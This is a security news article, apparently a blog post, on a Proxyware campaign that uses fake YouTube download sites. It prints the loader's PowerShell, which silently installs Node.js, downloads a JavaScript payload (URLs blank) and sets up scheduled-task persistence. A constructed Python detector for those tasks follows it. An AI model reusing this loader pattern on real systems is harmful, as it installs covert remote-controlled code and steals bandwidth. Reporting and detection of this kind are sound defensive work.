Cyber Web Spider Blog – News

Proxyware Malware Mimic as YouTube Video Download Site Delivers Malicious Javascripts


Posted on August 25, 2025 By CWS

Cybersecurity researchers have observed a surge in deceptive websites masquerading as YouTube video download services to deliver Proxyware malware in recent weeks.

Victims seeking to grab videos in MP4 format are redirected through ad pages that sporadically present a download link for a seemingly legitimate utility called “WinMemoryCleaner.”

Behind this innocuous facade, however, lies a multi-stage installer that ultimately deploys Proxyware and covertly enslaves the system’s network bandwidth.

The initial downloaded executable, Setup.exe, unpacks WinMemoryCleaner.exe into the Program Files directory before triggering an update script via WinMemoryCleanerUpdate.bat.

Once executed, WinMemoryCleaner.exe performs environment checks to evade virtual machines or sandbox analysis, then invokes a PowerShell payload that installs Node.js and fetches a malicious JavaScript component from a remote server.

Attack Flow (Source – ASEC)

ASEC analysts identified this technique as a refined evolution of earlier Proxyware campaigns, noting the attacker’s reliance on GitHub for hosting intermediary tools.

Subsequent stages involve the registration of two scheduled tasks, “Schedule Replace” and “WindowsDeviceUpdates”, that ensure the JavaScript runs periodically under Node.js.

This script sends basic system information to a command-and-control server and awaits directives, which may include fetching additional scripts or initiating the final Proxyware installation.

Information Sent to C&C Server (Source – ASEC)

ASEC researchers noted that the actor has pivoted from distributing only DigitalPulse and HoneyGain Proxyware to integrating Infatica’s agent, enhancing bandwidth theft capabilities.

The impact of this campaign is twofold: affected systems experience degraded network performance, and the attacker monetizes the stolen bandwidth through affiliate programs.

YouTube Downloader Page and Malware Download Link (Source – ASEC)

Proxyware programs typically share idle network throughput, promising remuneration to end users, but compromised victims unwittingly supply bandwidth without compensation.

In regions with high adoption of streaming services, such as South Korea, the campaign’s reach has grown significantly, prompting warnings from major AV vendors.

Infection Mechanism

A deeper examination of the infection mechanism reveals the pivotal role of the PowerShell script delivered by WinMemoryCleaner.exe.

The script begins with a stealthy installation of Node.js:

# The download URL is not given on the page.
Invoke-WebRequest -Uri "" -OutFile "$env:TEMP\node.msi"
Start-Process msiexec.exe -ArgumentList '/i', "$env:TEMP\node.msi", '/qn' -Wait

Once Node.js is in place, the script downloads pas.js from a cloudfront URL and registers it:

# The script URL is not given on the page.
$jsUrl = ""
Invoke-WebRequest -Uri $jsUrl -OutFile "$env:ProgramFiles\WinMemoryCleaner\p.js"
schtasks /Create /F /SC MINUTE /MO 30 /TN "Schedule Replace" /TR "node $env:ProgramFiles\WinMemoryCleaner\p.js"

Continuous execution of the JavaScript component under Node.js enables dynamic updates and final payload deployment, making eradication challenging without specialized tools.
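
A defender-side check for the persistence described above, as an added example that is not from the original article or the ASEC report: it scans exported `schtasks /query /fo csv /v` output for the task names, the Node.js-runs-a-.js action and the install directory named on this page. The sample rows, host names and the reason labels are constructed for illustration.

```python
import csv
import io
import re

# Task names exactly as printed on this page; confirm them against the
# ASEC report before relying on the name match alone.
KNOWN_TASK_NAMES = {"schedule replace", "windowsdeviceupdates"}
# node / node.exe launched against a .js file (the persistence pattern above).
NODE_JS_ACTION = re.compile(r"\bnode(\.exe)?\b.*\.js\b", re.IGNORECASE)
# Install directory named on this page.
INSTALL_DIR_MARKER = "winmemorycleaner"

# Constructed sample: a subset of the `schtasks /query /fo csv /v` columns.
SAMPLE_CSV = r'''"HostName","TaskName","Task To Run"
"WS-01","\Schedule Replace","node C:\Program Files\WinMemoryCleaner\p.js"
"WS-01","\WindowsDeviceUpdates","node.exe C:\ProgramData\upd\task.js"
"HostName","TaskName","Task To Run"
"DEV-07","\Nightly Build","""C:\Program Files\nodejs\node.exe"" D:\ci\build.js"
"WS-02","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c"
'''


def find_suspicious_tasks(csv_text):
    """Return one finding per task that matches any indicator from the page."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        task = row.get("TaskName") or ""
        if task == "TaskName":  # schtasks can repeat the header row; skip it
            continue
        action = row.get("Task To Run") or ""
        reasons = []
        # Task names are reported with their folder path, so compare the leaf.
        if task.rsplit("\\", 1)[-1].strip().lower() in KNOWN_TASK_NAMES:
            reasons.append("task-name")
        if NODE_JS_ACTION.search(action):
            reasons.append("node-runs-js")  # weak alone: dev hosts do this too
        if INSTALL_DIR_MARKER in action.lower():
            reasons.append("install-dir")
        if reasons:
            findings.append({"host": row["HostName"], "task": task, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_tasks(SAMPLE_CSV):
        print(finding["host"], finding["task"], ",".join(finding["reasons"]))
```

A finding that carries only `node-runs-js`, like the constructed DEV-07 build task, is a prompt for review rather than a verdict; the name and install-directory matches are the stronger signals.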

